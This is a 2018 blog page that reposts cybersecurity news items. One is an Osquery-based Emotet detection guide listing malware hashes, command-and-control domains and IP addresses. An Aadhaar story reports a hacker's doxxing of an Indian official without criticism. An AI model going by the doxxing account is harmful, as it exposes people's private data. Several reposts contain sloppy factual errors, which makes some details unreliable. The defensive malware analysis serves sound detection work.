FireSale HackBoy

Knowledge Shared By FireSale HackBoy...

Hacking

The Art Of Exploitation...

Ethical Hacking

Security Experts...Same Techniques To Make Hacker's Stuff Useless.

Black Hat Hacking

Dark Side Of Hacking... In Short Destruction Of Cyber Stuff.

Digital Stuff

All The Digital Stuff Is Under The Influence Of Cyber Attacks... Be Safe

Tuesday, July 31, 2018

National Risk Management Center to guard US Energy Companies against Cyber Attacks

It’s official that a new National Risk Management Center is said to guard the US energy companies against cyber attacks launched by state-funded actors. This news was shared to the world yesterday at a New York Security conference by Homeland Security Secretary Kirstein Nielson who added in his statement that the top priority of the security center will be to guard the critical infrastructure against other country digital invasions.

Readers of Cybersecurity Insiders have to notify a fact over here that the statement comes just after 5 months when the top 5 pipeline operators in the US said that their 3rd party digital communication systems were shut down by hackers who were planning to shadow certain parts of American with a complete blackout.

According to the sources from Bloomberg, the center’s priority will be to focus on the assets of energy, finance, and telecom sector. And then will try to defend other IT assets of the fed like air transport facilities, water processing plants and such.

Note- In April this year, Cyber Security firm Symantec Corp said that it has tracked at least 140 groups targeting energy companies which is up from just eighty-seven in 2015.

Last week, the US Intelligence director said that hacking groups funded by Russia, China and Iran are trying to compromise dozens of US companies which include those operating in the energy sector. And their objective is simple-to create a political and economic instability.

US new National Risk Management Center is designed to allow the industry and the public sector to better coordinate on mitigating cyber risks and responding to attacks. Here Homeland security is said to play a vital role in doing so as it has positioned itself to take a convening arm role to bring important sectors of America to help organize and harmonize the counter-response.

A major cybersecurity exercise is said to be held by DHS later this year and it will be in lines with Britain’s NCSC.

Note- US President Donald Trump is leaving no stone unturned to make America greatest. As he thinks that cyber attacks on US Companies might hinder the progress, he has given the law enforcement full powers to coordinate and defend the American IT assets from all sorts of foreign invasions- which the former US president Barack Obama said to have ignored during his 8-9 years of tenure.

The post National Risk Management Center to guard US Energy Companies against Cyber Attacks appeared first on Cybersecurity Insiders.


August 01, 2018 at 11:07AM

Cisco sends fake phishing emails to its employees

Networking Giant Cisco has sent its employee’s fake phishing emails in order to train them against cyber attacks. The objective was to educate them on how phishing emails hit targets and how a corporate network can be defended against such attacks.

Steve Martino, the Chief Information Security Officer at Cisco is said to have developed this clever technique through years of his experience fighting the bad guys. It’s said that Martino introduced such fake phishing email attacks into the corporate environment operations since September last year and is known to implement the same in the corporate environments on a quarterly basis.

“Like every student or office worker knows how to get out of the building fast when an emergency occurs, the same should be true in the case of cyber threats”, said Martino. His management’s aim is to set up a Cybersecurity playbook with defined steps that the team needs to take in case if it’s hit by the worst nightmare.

One way of defending the infrastructure is to train the employees in advanced to persistent cyber threats. And that’s what Martino and his management are doing so by launching fake email phishing attacks.

And anyone who is caught clicking on the test links is brought to an employee training video to teach them how to avoid engaging with suspicious emails in the future.

This mode of teaching or educating the employees works excellently as it helps every employee to understand their role in protecting their company against all variants of cyber threats and helps to educate them with the latest in the cyber landscape.

The success rate of Cisco’s phishing emails training is yet to be known.

The post Cisco sends fake phishing emails to its employees appeared first on Cybersecurity Insiders.


August 01, 2018 at 11:04AM

Cyber Attack news for this week

UK’s largest electronics retailer Dixons Carphone has made an official announcement on Tuesday that around 10 million records containing personal data of its customers could have been obtained in a cyber attack in 2017- which is much higher than the earlier estimates. However, the UK based company which holds a retail network clarified that the leaked records do not contain payment card or bank account details.

Now, to those who are new to this news, here’s a briefing. In June this year, an investigation revealed that one of the processing systems of Currys PC World and Dixons Travel Stores was intercepted by hackers who accessed around 5.9 million credit card data. Now, a joint investigation conducted by Britain’s National Crime Agency in association with the National Cyber Security Center says that over 10 million records were breached, but did not contain any financial info.

In another news related to the cyber attack, an extensive research conducted by Sophos has revealed that SamSam Ransomware authors or spreaders have so far succeeded in raising almost $6 million from malware attacks. The research was conducted on how the SamSam ransomware has originated, was being targeted and how it has evolved, since its first appearance in December 2015.

From July 24th this year, an area called Matanushka-Susitna(Mat-Su) located in Borough Anchorage Metropolitan area is said to be suffering from a ransomware attack which disrupted the operations of internet, phones and email services of the government networks. The news is out on an official note that over 650 desktops were infected by the BitPaymer Ransomware and this includes almost 7 servers. Till Tuesday, over 110 workstations were repaired by the IT staff of Mat-Su and some communication systems were reported to have been brought back to life.

Mat-Su IT director Eric Wyatt confirmed the news and said that FBI and the local law enforcement agencies were informed about the incident.

The January 2017 ransomware attack on Washington DC’s Police department’s surveillance system is said to have been launched by two Romanians who were planning something big in the attempt. Last Friday, the prosecutors spelled out a statement which says that the two Romanians were intending to send ransomware to more than 179,000 email addressed via the CCTV servers of Washington DC. For those who aren’t aware of this news, here’s a briefing on it. On January 12, 2017 i.e a week before the 45TH president Donald Trump took oak, over 123 surveillance cameras of the DC went dark.

When the US law enforcement started an investigation, it discovered that the online assailants infected 4 storage systems belonging to CCTV servers with ransomware and were demanding a payment of about $60,000 worth of Bitcoins. But in actuality they were planning something big through the attack which was obstructed by the US law enforcement agencies on time. Both the accused were arrested by the Romania police last December and both confessed to the fact that they were also behind the spread of Cerber ransomware.

The post Cyber Attack news for this week appeared first on Cybersecurity Insiders.


July 31, 2018 at 09:25PM

Malware Analysis using Osquery Part 1

Tools like Sysmon and Osquery are useful in detecting anomalous behavior on endpoints. These tools give us good visibility of what’s happening on endpoints by logging multiple types of events, which we can forward to a SIEM or other correlation system for analysis.

In this blog series, we’ll analyze different malware families, looking at the types of events generated on the endpoint and how we can use Osquery to detect them.

Let’s start!

Let’s start by analyzing the famous Emotet Banking Trojan, which is a continuous threat that targets a lot of countries and company sectors (The Evolution of Emotet). The dropper spreads through email phishing and downloads the malware using a malicious Office macro.

File samples:

https://app.any.run/tasks/b30d3215-a238-415e-ba7d-a884e1505758

https://www.virustotal.com/#/file/c932d54a9ef3c645a28b7d8de9747fc6c06fc23c6d65c036da4eae4d778a81db

As we can see in the sandbox report, the Office macro executes PowerShell with an encoded command to download the payload.

If we run the sample in our environment with Osquery installed, we can build a query to retrieve events generated by PowerShell from the powershell_events table. Osquery reads the Microsoft-Windows-PowerShell eventlog channel, so you need to enable Script block logging.

We can see the encoded PowerShell command and also the script text code generated after decoding the command.

Once PowerShell is downloading the payload, Osquery can log socket connections opened by any process. We can do an easy JOIN between process_open_socket table and processes table to see which processes are making network connections.

It’s interesting to see which files have been written on disk during the payload download. To do so, we can query the file table that stores some useful fields (file table schema). This table needs a WHERE condition to return results, so we can add some filters like Users directory and files created in the last 100 seconds for example.

The downloaded file from PowerShell is a Emotet dropper that extracts the final payload and executes it (squarectx.exe). Now, let’s query the system running processes. Similar to above, we can do a JOIN with users table to see the username column. Some rows have been omitted for a cleaner view.

Now we know that Emotet malware is running in our environment and probably is doing malicious things, so let’s look for signs of malware activity. For that, we reuse the query we used above to see network connections from system processes. Here, we can detect communication to the Command and Control server.

As we have seen, it is possible to analyze malware and extract valuable information using tools like Osquery that give us rich visibility of systems events.

How AlienVault uses Osquery

Osquery allows you to retrieve a wealth of events and useful information from your endpoints. This can be extremely helpful for investigating security incidents as well as threat hunting activities on your critical assets.

AlienVault leverages Osquery through the AlienVault Agent to enable threat hunting in both USM Anywhere and the Open Threat Exchange.  

The AlienVault Agent is a lightweight, adaptable endpoint agent based on Osquery and maintained by AlienVault. In USM Anywhere, the AlienVault Agent enables continuous endpoint monitoring, using the built-in AlienVault threat intelligence to automate endpoint queries and threat detection alongside your other network and cloud security events. This allows USM Anywhere to deliver endpoint detection and response (EDR), file integrity monitoring (FIM), and rich endpoint telemetry capabilities that are essential for complete and effective threat detection, response, and compliance.

Try it for yourself in the USM Anywhere Online Demo.

In April, AlienVault introduced the Endpoint Threat Hunter  – a free threat-scanning service in Open Threat Exchange® (OTX™) based on the AlienVault Agent. OTX Endpoint Threat Hunter allows anyone to determine if their endpoints are infected with the latest malware or other threats by manually scanning their endpoints for the presence of indicators of compromise (IoCs) that are catalogued in OTX.

Get started with OTX Endpoint Threat Hunter Free: https://otx.alienvault.com/endpoint-threat-hunter/welcome

Here is an example of how we detected Emotet infection on an analysis system using OTX Endpoint Threat Hunter.

In the next posts of this blog series, we will see other malware families and explore how to detect activity like system persistence and many others techniques.

Stay tuned!

Appendix

Queries

select time, script_text from powershell_events;

select processes.name, process_open_sockets.remote_address, process_open_sockets.remote_port from process_open_sockets LEFT JOIN processes ON process_open_sockets.pid = processes.pid WHERE process_open_sockets.remote_port != 0 AND processes.name != ”;

select path, size, from file where path like ‘C:Users%%’ and mtime > (select local_time from time) – 100 and filename != ‘.’;

select processes.pid, users.username, processes.path from processes LEFT JOIN users ON processes.uid = users.uid WHERE processes.path != ”;

Files

c932d54a9ef3c645a28b7d8de9747fc6c06fc23c6d65c036da4eae4d778a81db     

9f6325ebce797b5ceec1bbf32e61aec8fbe8b650       

124d03b86227bbf282f0f567ae11858e           

bafc6731efd63f57c89653b24ba532ac1e96d259993c8f3d96d26e1cf6cd57d3        

DNS requests

samoticha.de  

okane-mikata.com      

Connections

81.169.145.82 

112.78.117.29

184.186.78.177

74.139.102.161

OTX

https://otx.alienvault.com/browse/pulses?q=emotet

       

The post Malware Analysis using Osquery Part 1 appeared first on Cybersecurity Insiders.


July 31, 2018 at 09:09PM

Monday, July 30, 2018

Hackers target UnityPoint Health with email phishing scam

UnityPoint Health, an Iowa based healthcare provider has announced that it has become a victim of a recent email phishing scam which could have compromised the health and personal information of more than 1 million patients including social security numbers and critical financial information.

The healthcare services provider which has a network of hospitals, clinics, and home care services in Iowa, Illinois and Wisconsin says that data related to more than 1.45 million patients could have been accessed by hackers during the cyber attack that was launched on the servers holding internal email accounts between Mar 14 to April 3rd.

In a statement released on Monday, the nonprofit organization said that the attack on its servers was discovered on May 31st this year and the law enforcement and a third party security company were pressed into the service to investigate the matter in detail.

The investigation revealed that the attack was not caused by an insider threat and confirmed that some officials were tricked via email to provide login credentials to give internal email access to attackers.

All the patients who were affected by the incident have been informed via mail by Unity Point and the health services provided issued an apology for the data spill. For those people whose Social security or driving license numbers were leaked, the company is ready to offer a free credit monitoring service for one full year from June 1st, 2018. A helpline has been allotted for assisting the patients on this note and the number is 888-266-9285.

As a precautionary measure, the company has reset the passwords of all compromised accounts, implemented multi-factor authentication for users, added advanced threat detection technology and is said to conducted mandatory education for employees after the breach.

The post Hackers target UnityPoint Health with email phishing scam appeared first on Cybersecurity Insiders.


July 31, 2018 at 10:55AM

Oversharing of information on social media is resulting in money loss

Young people, especially those who are in their mid-20s to 30s are said to be falling prey to fraudsters dye to over sharing of their information on social media. Thus, it is leading to account hacks and sometimes money loss from their respective bank accounts.

A survey conducted by Nationwide Building Society in the UK has divulged in its report that 83% of the British people overshare on social media often leading to bank accounts drain.

The survey discovered that more than 4 in ten admitted that one of their friends or they themselves have lost money as a result of a social media hack. They still do not know how the incident took place but admitted that they share important info about themselves online, including their birthday, place or work or their current location.

Although, it might prove trivial for hackers to carve out a user profile from such data, in most cases hackers are able to piece the info together and use it to take over users online accounts and even steal money.

Nowadays, as some shopping websites are allowing to shop with the social media credentials such as Facebook, the situation has deteriorated on a further note- especially those which in lines with Farmville.

Its obvious that social media is proving as a great platform to connect with friends and family members. But at the same time, it’s a fact that some data sharing blunders committed by social networking users are proving gold to hackers.

So, how to isolate yourselves from such online frauds?
•    Remember, no bank or organization will ask you for your pin, password or other credentials- either by a call, SMS or email.
•    Hand over your personal and financial details to entities only which you trust
•    Never click on email links sent from unknown sources or those servers which pretend to be legitimate.
•    If in case, someone approaches you on a manual note to provide credentials, immediately notify the activity to your bank authorities.

Hope, it helps in curbing the online fraud menace!

The post Oversharing of information on social media is resulting in money loss appeared first on Cybersecurity Insiders.


July 31, 2018 at 10:52AM

McAfee says fileless cyber attacks are on the rise

American Computer security software McAfee has released a security report for 2Q 2018 which says that ‘fileless’ cyber attacks are on the rise in 2018 and they are leveraging the trusted Windows executable to invade systems and breach corporate networks.

Note- A fileless cyber attack also called as zero footprint attack, macro attack or non-malware attack works by taking advantage of applications that are already installed on the infected PC. The malware is virtual and is seen taking advantage of the in-memory until the system gets rebooted in most cases.

According to the global security report of McAfee Labs, CactusTorch proved the most notorious of the fileless threats which uses the ‘DotNetToJScript’ technique which loads and executes malicious .NET assemblies straight from memory. As both corporate, as well as individuals, have fallen prey to this threat the surge was observed to be over 432% than in 2017.

And as expected the said attacking technique could bypass antivirus software and corporate firewalls without being detected as it takes the advantage of the trust factor between security software and genuine signed Windows applications.

McAfee says the only way to protect the networks against such attacks is to invest in primary security protections like a high end to end encryption, 2-factor authentication, and installation of latest efficient anti-virus solutions which are being updated on a regular note. Having controlled and efficient administrative access also plays a vital part in securing a business from attacks.

Educating the staff and the C-level management about the existing and upcoming security threats could play a vital role in nullifying all variants of detrimental fileless attacks on an organization.

The post McAfee says fileless cyber attacks are on the rise appeared first on Cybersecurity Insiders.


July 30, 2018 at 09:20PM

Hope for the Best, Plan for the Worst

In an attempt to wake up companies that may not be taking security as seriously as they should, they are often told, “It’s not a matter of if, but when.”

Historically, I’ve not been the biggest fan of this term, in that it has a certain undertone of doom and gloom. A bit like one of those life insurance commercials that morbidly remind you that you will die some day and you want your loved ones to be looked after financially.

The reality is though, that as depressing as it may sound, we will all die at some point. And it is likely that a company that uses technology and is connected to the internet in some way, shape or form, will likely experience and incident of some magnitude over the course of its life.

Being attacked or compromised by an external or internal party isn’t a black swan event that falls outside of the norm. It’s very much a part of everyday life.

Where many companies go wrong is believing they can eliminate these attacks completely. But this isn’t practical because randomness and variability are the rule, not the exception.

It’s like when you have a flight to catch, most people will tend to leave earlier than needed to factor in unforeseen traffic, or other delays. Because we know and understand that a journey consisting of planes, trains, and automobiles will inevitably encounter some delays. So we plan for it.

Similarly, enterprises should plan for the unexpected, build it into its fabric to ensure it can not only remain resilient, but flourish in times of adversity.

So, what can make a company more resilient to security incidents and black swan events?

Hack yourself

What better way to see how an attacker will fare against your systems than to subject your systems yourself to the same stresses. It’s not so much a case of proving that all your systems are unbreakable, but rather it gives you a level of assurance as to how long your defences can hold up, whether you have effective means of detecting and responding, and perhaps more importantly, what the impact on the business or customers will be.

Add redundancies

Often, when speaking of redundancies we think of business continuity planning which inevitably many boil down to the art of “buying two of everything.”

Often a company may avoid the cost associated with having redundant systems because it may never be used. Although, the truth is that not needing a redundant system is the exception, not the rule.

It’s also important to have alternative redundancies in place. For example, if a system goes down, is there a manual workaround that could be deployed? Could online transactions be diverted to call centres? If cash is unavailable, can cryptocurrencies be used? Or precious metals? Or cigarettes even.

Not all risks are created equal

Critical assets are the life blood of an organisation. They are the crown jewels that help the company be profitable through sales, services, or innovation. But it can become easy to miss some of the risks amongst the large sea of issues.

Which is why it can make sense for companies to at least adopt a dual risk strategy whereby it can play it safe in some areas and take more risks in other.

Have multiple points of resilience

It’s not just attacks that are on the rise. There are a number of factors such as errors, changes, or infrastructure migrations that can all lead to security incidents. Therefore it’s important to build resilience at multiple points across the business.

Maybe it’s time to stop fearing, or thinking of the phrase, “it’s not if, but when” in a negative light – but rather as a positive opportunity – one that can allow security teams to proactively innovate to get the best outcome for themselves, and their company.

      

The post Hope for the Best, Plan for the Worst appeared first on Cybersecurity Insiders.


July 30, 2018 at 09:08PM

The Bitglass Blog

If the volume and level of conversations we enjoyed at the RSA Conference in Singapore last week are anything to go by, Bitglass and the partners in our Altitude Partner Program have every reason to feel optimistic about the Asia Pacific region.

For three days on the show floor, the Bitglass stand was consistently busy with visitors asking about our Next-Gen CASB and how we can help them solve data security problems relating to the use of cloud and mobile devices. Unlike some previous events, we spent little time having to answer “What’s a CASB?” or “Why would we need a CASB?”

The post The Bitglass Blog appeared first on Cybersecurity Insiders.


July 30, 2018 at 09:08PM

How to Make Remote Work Easy

The commute is killing you. You sit in endless boring meetings. Phones are ringing and your colleague is moving his table for the fifth time today. Someone is looking over your shoulder. The suit that you’re wearing is uncomfortable.

Isn’t the nine-to-five day great? Thankfully, today we have a contender: working remotely.

When working remotely you get all the benefits that you’ve heard and imagined before — work in your sweatshirt, no more commuting, save money on lunch by eating cheap and healthy food, attend only meetings that you absolutely have to, be more productive and, of course, manage your time the way you see fit.

More and more people are switching to remote work, but it would be pointless for your employer or your career if working from a hammock on a remote beach caused productivity to suffer. Fortunately, there are plenty of software tools to make the transition easier, all you need is WiFi or some form of internet access. In this article, we’ll take a look at some of those tools that make remote work easy.

 

1. Google Drive

2. Box Note Taking

3. Egnyte Connect

4. Slack

5. Trello

 

Read more…

The post How to Make Remote Work Easy appeared first on Cybersecurity Insiders.


July 30, 2018 at 11:58AM

Sunday, July 29, 2018

Telegram Passport number addition surges data privacy concerns

Britain’s messaging app Telegram has added a new feature onto its platform which allows users to store their identity documents such as Passport Numbers or social security numbers on telegram’s encrypted cloud storage. The objective of this feature is to allow users to showcase their identity documents to Initial Coin Offerings (ICOs) and cryptocurrency exchange sites to verify their identity.

But security experts suggest that identity documents storage on cloud storage platforms can invite more trouble to those who are strictly concerned about data privacy. It’s like pleading hackers to invade your privacy.

However, Telegram says that the data loaded onto its cloud platforms will be highly protected and has specified in its statement that users will be the sole proprietors to whatever data is being fed to the cloud by them.

As the usage of cryptocurrency is spreading like wildfire all throughout the world, and as the holiday season is fast approaching, companies dealing with digital coins or those acting as payment gateways to cryptocurrencies like Bitcoins, Monero and Litecoins are and will insist on users proving their identity to the service providers.

“This is where the trouble starts..” says Elliot Anderson, a French security expert. Elliot who owns a security company doing pen tests says that sensitive information share can put your future into jeopardy. The data can land them into financial frauds and can also lead you into the legal mess.

Meanwhile, Telegram has issued a press statement that the data stored on its cloud will be in highly encrypted form and will soon be moved to a decentralized storage i.e dispersed storage platforms.

Note- Telegram is a cloud-based instant messaging app which also offers VOIP services. Although the company claims to have registered itself in London, its founder and entrepreneur Pavel Durov have accepted that the servers of the said app operate from his home country Russia. Countries like Indonesia, Iran, and Russia to a certain extent tried their best to ban the app. But it’s said that only Iran succeeded in doing so on a complete note. And Indonesia and Russia failed in their attempt due to the immense popularity among the internet using populace of their respective countries.

The post Telegram Passport number addition surges data privacy concerns appeared first on Cybersecurity Insiders.


July 30, 2018 at 09:56AM

Indian Prime Minister challenged by French Security Expert for Aadhaar details

Indian Prime Minister Shri Narender Modi was challenged by a French security expert named Elliot Anderson for sharing his Aadhaar details i.e. only if he has one. The challenge comes just after the exposure of certain sensitive details like passport number, email ID, PAN number, alternative phone number, WhatsApp picture profile photo and mobile number of the Indian Telecom Chief RS Sharma.

Now, to those who are just aren’t aware of what is happening, here’s a briefing on the whole issue.

Last week, Indian Telecom Authority of India (TRAI) chairman RS Chairman displayed his Aadhaar number on his twitter handle and challenged to the world to expose his personal details based on just his UID number.

Note 1- Aadhaar number is a 12- Digit Unique Identity Number that can be obtained by residents of India, based on their biometric and demographic details. It is in line with the Social Security Number which is assigned to each American individual in the United States and Singapore.

Anderson, who often interacts with the world with his @kingslyj twitter handle accepted the challenge of Mr. RJ Sharma and exposed all the personal details of the TRAI chief within 3 hours time. He also posted a picture of Mr. Sharma on his twitter handle and blackened the face of a lady posing beside’s Sharma and added a quote “I suppose she is your wife or daughter”.

Some more ethical hackers accepted the challenge of Sharma and posted details such as his iPhone IMEI number and the bank accounts to which his Aadhaar card was linked.

Note 2- On March 10th, 2018, Anderson started an Anti-Aadhaar campaign by announcing to the world that he will start playing with the UID numbers of Indians. After three days of his announcement, he posted details of around 20K UID cards online followed by the passwords which were protecting them through encryption on the database.

Recently, the Prime Minister’s Office in India has announced that the introduction of Aadhaar has added great strength to India’s economy and the country’s further development by saving Rs 60,000 Cr dispersed via various government subsidies which were earlier reaching to ‘wrong hands’.

Now, Elliot has asked the Indian Prime Minister to dare share his Aadhaar details to see what secrets he could expose of the BJP Leader who is leading the Indian subcontinent standing 6th in the world’s largest economies.

The post Indian Prime Minister challenged by French Security Expert for Aadhaar details appeared first on Cybersecurity Insiders.


July 30, 2018 at 09:52AM

The Pirate Bay alternatives (2018) in wake of Cryptomining scandal

By Waqas

The process of cryptocurrency mining slows down your computer and increases the energy bill – That is why it is time to find The Pirate Bay alternatives. The Pirate Bay is undoubtedly one of the most visited torrenting and file sharing websites. But did you know ThePirateBay.org is using the computing power (CPU) of your computer to mine cryptocurrency? […]

This is a post from HackRead.com Read the original post: The Pirate Bay alternatives (2018) in wake of Cryptomining scandal


July 30, 2018 at 04:03AM

Parasite HTTP RAT loaded with advanced detection evasion capability

By Waqas

Proofpoint researchers have discovered a new remote access Trojan (RAT) as well as an updated version of an already identified banking Trojan and claim that both the RATs are involved in recently detected phishing campaigns targeting the retail, healthcare and IT industries. Emails containing MS Word attachments are being sent, which contain hidden malicious macros […]

This is a post from HackRead.com Read the original post: Parasite HTTP RAT loaded with advanced detection evasion capability


July 29, 2018 at 04:00PM

Saturday, July 28, 2018

Flaw in Swann smart security cameras allows access to user’s live stream

By Waqas

Security cameras and other IoT devices have been frequently identified to be incompetent and plagued with a variety of built-in flaws that render them vulnerable to exploitation by hackers. The same has been proven yet again by a team of security researchers from Pen Test Partners. Researchers Andrew Tierney, Chris Wade, and Ken Munro participated […]

This is a post from HackRead.com Read the original post: Flaw in Swann smart security cameras allows access to user’s live stream


July 28, 2018 at 08:38PM

RFA Secures Office 365 with the Next-Gen CASB

This post was originally published here by Jennifer Perisho.

A few weeks ago, Bitglass’ CMO Rich Campagna sat down with the CIO and CTO of Richard Fleischman & Associates (RFA) for our latest customer testimonial video. As a technology advising and consultancy group, RFA has spent over thirty years providing its clients with IT security tools that can protect sensitive financial data. In addition to protecting its own data in apps like Office 365, part of RFA’s search for cloud security was to identify a technology that its customers could use to protect their information as it moves off premises.

Naturally, RFA turned to Bitglass, the Next-Gen CASB. With smooth deployment, next-gen technology, and unparalleled customer support, RFA’s CIO quickly recognized the value of Bitglass’ solution. Together RFA and Bitglass have been rockin’ the CASB! Watch the video below.

Photo:Tech Funnel

The post RFA Secures Office 365 with the Next-Gen CASB appeared first on Cybersecurity Insiders.


July 28, 2018 at 05:46PM

A GROWING NUISANCE: HOW TO FEND OFF BAD BOTS

This post was originally published here by (ISC)² Management.

Bad bots make up more than one third of internet traffic, and although some of them try to influence elections and feed conflict on social media, most are targeting business websites, according to a newly published report.

Set loose across the internet, armies of bad bots constantly carry out a multitude of misdeeds against businesses in just about every industry. Their activities include scraping prices by competitors looking to gain an upper hand in price SEO searches, stealing proprietary content, taking over accounts with stolen credentials, perpetrating credit card fraud, skimming money from gift card accounts and executing DDoS (distributed denial of service) attacks.

In 2017, bad bot internet traffic grew 9.5 percent to about 22 percent of all traffic, primarily targeting industries such as gambling, airlines, finance, healthcare and retail, according to the 2018 Bad Bot Report published by Distill Networks.

“Bad bots interact with applications in the same way a legitimate user would, making them harder to detect,” according to the report. “Bots enable high-speed abuse, misuse, and attacks on your websites and APIs. They enable attackers, unsavory competitors, and fraudsters to perform a wide array of malicious activities.”

See No Evil

Fighting bad bots is time-consuming and challenging. Their origins are difficult to determine, and if an organization attempts to take legal action against perpetrators, it will likely run into roadblocks. Such action is costly and if the bot operators are in a different country, legal action may prove futile.

Businesses often ignore bots because they don’t understand the damage they cause. While a business turns a blind eye, bots could be stealing valuable intellectual property, breaking into user accounts or carrying out some other mischief. Any of these activities can cause financial losses, incur mitigation costs and hurt a company’s reputation once a breach becomes public.

Cybersecurity teams cannot afford to ignore bad bots, considering that according to Distill Networks, “every business with an online presence is regularly bombarded by bad bots.” As such, every company needs a plan to deal with this cyber nuisance.

Fight Back

The bad bot report includes a set of recommendations for businesses to protect themselves. Bad bots target different businesses and industries for different reasons, so there is no single solution for the problem.

However, here are some measures you can take:

  • Block outdated user agents and browsers
  • Block suspicious hosting and proxy services
  • Monitor traffic sources to spot bot activity
  • Investigate traffic spikes generated by a suspicious single source
  • Keep an eye on every bot access point, including websites and mobile apps
  • Monitor for failed login attempts and failed validation of gift card numbers

Data and People

Understanding how bad bots operate, and what they are after, is crucial to figuring out how to fight them. It takes a combination of technology, security best practices and well-crafted policies to address bad bots, as is the case with most cybersecurity challenges.

In our report “Hiring and Retaining Top Cybersecurity Talent,” published this spring, (ISC)2 found that the ability to “protect people and data” is one of the most important attributes cybersecurity jobseekers look for when evaluating a potential new employer. Effective bad bot protection fits into that mission – and may be something jobseekers take into account before accepting an offer.

The post A GROWING NUISANCE: HOW TO FEND OFF BAD BOTS appeared first on Cybersecurity Insiders.


July 28, 2018 at 05:27PM

Friday, July 27, 2018

ICO hacked: Hackers steal $8 million from KICKICO Blockchain network

By Waqas

Another day, another ICO hacked. This time, KICKICO, an Initial Coin Offering (ICO) project that lets users conduct ICOs, pre-ICOs, crowdfunding and crowdinvesting campaigns have suffered a security breach and as a result, hackers have stolen more than 70 million KickCoins which is around $7.7 million. The cyber attack took place on Thursday, July 26th when hackers breached […]

This is a post from HackRead.com Read the original post: ICO hacked: Hackers steal $8 million from KICKICO Blockchain network


July 28, 2018 at 03:25AM

Spectre attack variant can be remotely mounted to extract sensitive data

By ghostadmin

What we know so far about Spectre attacks is that it relies upon execution of malicious code. The code is executed on computers having speculative-execution design flaws in processor chip; once a device is compromised, it becomes possible to obtain sensitive data such as passwords, PINs, and keys. Such data is usually stored in the […]

This is a post from HackRead.com Read the original post: Spectre attack variant can be remotely mounted to extract sensitive data


July 27, 2018 at 09:29PM

Things I Hearted this Week, 27th July 2018

Welcome to your weekly security roundup, providing you all with the security news you deserve, but maybe might not need.

As always, these news stories are human-curated by me – no fancy algorithms, no machine learning, and definitely no trending topics here.

We are less than two weeks away from Blackhat in sunny Las Vegas. We’ll be there – pop along to booth 528 and say hello if you’re there.

Google: Security Keys Neutralized Employee Phishing

Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes.

While we’re on the topic of phishing, attackers used phishing emails to break into a Virginia bank twice in eight months, making off with more than $2.4 million in total. Now the bank is suing its cybersecurity insurance provider for refusing to fully cover the loss.

We’re probably going to see more of this kind of back and forth as companies that have taken out cyber insurance and suffered a breach fight with their insurers over liability and who will cover the cost.

Somewhat related:

Breaking the Chain

Supply chain and third party risks are getting better understood, but understanding a risk doesn’t necessarily mean it will reduce the risk.

Tesla, VW, and dozens of other car manufacturers had their sensitive information exposed due to a weak security link in their supply chains.

SIM Swap – A Victim’s Perspective

This is a really good write-up by AntiSocial engineer taking a look at how SIM swap fraud can impact victims, and why mobile phone operators need to do more to prevent this kind of fraud.

“It’s an all too common story, the signal bars disappear from your mobile phone, you ring the phone number – it rings, but it’s not your phone ringing. Chaos ensues. You’re now getting password reset emails from Facebook and Google. You try to login to your bank but your password fails.  Soon enough the emails stop coming as attackers reset your account passwords. You have just become the newest victim of SIM Swap Fraud and your phone number is now at the control of an unknown person.”

EU Fails to Regulate IoT Security

In this week’s head-scratching moment of “what were they thinking?”, the European Commission has rejected consumer groups’ calls for mandatory security for consumer internet-connected devices because they believe voluntary security from manufacturers is adequate. What a blow! 

And on cue,

When an Outdated Router Costs $1M

If you have an outdated router in a remote branch, what’s the worst that could happen? Well, apparently a lot more than you bargained for.

A notorious hacking group known as MoneyTaker has stolen roughly $1 million from a Russian bank after breaching its network via an outdated router.

The victim of the hack is PIR Bank, which lost at least $920,000 in money it had stored in a corresponding account at the Bank of Russia.

The Impact of GDPR

Under GDPR, data breach reports in the UK have quadrupled. The ICO has reported 1,750 breaches in June, up from 400 in April.

And speaking of breaches:

Randomness

Here are a few other news and articles I found interesting this week, some of which aren’t related directly to security.

      

The post Things I Hearted this Week, 27th July 2018 appeared first on Cybersecurity Insiders.


July 27, 2018 at 09:09PM

China, Russia, and Iran are top cyber threats to the United States

A report from the National Counterintelligence and Security Center released on Thursday states that China, Russia, and Iran are the top cyber adversaries to the US as these three nations have been caught red-handed conducting foreign economic and industrial espionage on American soil.

The NCSC report says that the said three nations have been consistently stealing the trade secrets of United States for years on a digital note and are still ruining America’s prosperity by invading its security secrets from time to time – all to gain a competitive advantage.

Since Donald Trump is about to impose sanctions on Iran, the country is now topping the list for conducting several cyber operations on US firms and interests. For instance, a hacker’s group named “Rocket Kitten” from Iran has been accused to invade into the defense secrets of US in order to bolster their strength in missile and space programs. So that they can take an edge over the United States in military technology and other areas.

China stands second on the list as it continues to use cyber espionage to support its strategic developments goals such as science and technology evolution, military modernization, and economic policy objectives.

Russia stands in the third position when it comes to the list of US adversaries as it has and is continuing to use cyber espionage skills as an instrument to collect information which benefits its economic interests.

Surprisingly, the list doesn’t include North Korea and it might be due to the fact that North Korean leader Kim Jong Un has portrayed truce between the two nations especially after his June ‘18 meeting in Singapore with Donald Trump which went cordially as per the white house report.

In a media briefing held yesterday, William Evanina, the director of the National Counter Intelligence and Security Center told the media that his country will from now not go numb towards its adversaries who have and are stealing the intellectual property and trade secrets of the nation.

As there is no sign of the cyber thefts will stop, Mr. Evanina said that his nation will start becoming aggressive towards such nations in cyber landscape and will start isolating them from the globe in all forms.

The post China, Russia, and Iran are top cyber threats to the United States appeared first on Cybersecurity Insiders.


July 27, 2018 at 09:01PM

5 WAYS TO GET THE MOST OUT OF SECURITY CONGRESS

This post was originally published here by  (ISC)² Management.

Security Congress is less than three months away! This year’s biggest and best cybersecurity conference will be held in New Orleans, Louisiana from October 8-10. Attending this year’s event can earn you as many as 46 CPEs for the year. To make sure you get the most out of #ISC2Congress, here are five things to do before you get to NOLA:

  1. Register for workshops

Reserved seating workshops are new to Security Congress this year. We will have five workshops available throughout the conference that require a registration. If you’ve already signed up for Security Congress, great! You can login to your registration and add them to your schedule. If not, hurry! Only 60 seats will be available in each workshop and most are close to full already. Security Congress workshop session numbers are 3010, 3011, 3012, 3013, 3014 and 3015 and can be found in the online agenda.

  1. Make cybersecurity personal

